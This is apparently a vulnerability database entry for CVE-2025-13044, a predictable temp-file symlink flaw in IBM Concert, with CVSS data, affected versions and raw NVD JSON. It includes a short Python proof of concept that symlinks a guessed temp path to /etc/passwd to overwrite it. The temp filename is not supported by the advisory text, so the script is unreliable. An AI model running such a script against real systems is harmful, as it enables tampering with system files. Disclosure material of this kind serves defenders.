Security Vulnerability Report
中文
CVE-2025-13044 CVSS 6.2 MEDIUM

CVE-2025-13044

Published: 2026-04-07 02:16:15
Last Modified: 2026-04-07 18:18:54

Description

IBM Concert 1.0.0 through 2.2.0 creates temporary files with predictable names, which allows local users to overwrite arbitrary files via a symlink attack.

CVSS Details

CVSS Score
6.2
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N

Configurations (Affected Products)

cpe:2.3:a:ibm:concert:*:*:*:*:*:*:*:* - VULNERABLE
IBM Concert 1.0.0
IBM Concert 1.0.1
IBM Concert 1.0.2
IBM Concert 2.0.0
IBM Concert 2.1.0
IBM Concert 2.2.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3 import os import time # Configuration target_file = "/etc/passwd" # Target file to overwrite predictable_temp = "/tmp/concert_session.tmp" # Predictable temp file name print(f"[*] Attempting to create symlink: {predictable_temp} -> {target_file}") try: # Remove existing link/file if present to avoid errors if os.path.lexists(predictable_temp): os.remove(predictable_temp) # Create the symbolic link os.symlink(target_file, predictable_temp) print(f"[+] Symlink created successfully.") print("[*] Waiting for the vulnerable application to write to the temp file...") # In a real attack, this would wait for the specific trigger or loop time.sleep(10) print("[*] Check if the target file has been modified.") except Exception as e: print(f"[-] Error: {e}")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-13044", "sourceIdentifier": "[email protected]", "published": "2026-04-07T02:16:15.343", "lastModified": "2026-04-07T18:18:54.453", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "IBM Concert 1.0.0 through 2.2.0 creates temporary files with predictable names, which allows local users to overwrite arbitrary files via a symlink attack."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "baseScore": 6.2, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.5, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-340"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:ibm:concert:*:*:*:*:*:*:*:*", "versionStartIncluding": "1.0.0", "versionEndIncluding": "2.2.0", "matchCriteriaId": "2E37B307-BAA4-487B-958B-7354E39D7B2A"}]}]}], "references": [{"url": "https://www.ibm.com/support/pages/node/7268620", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}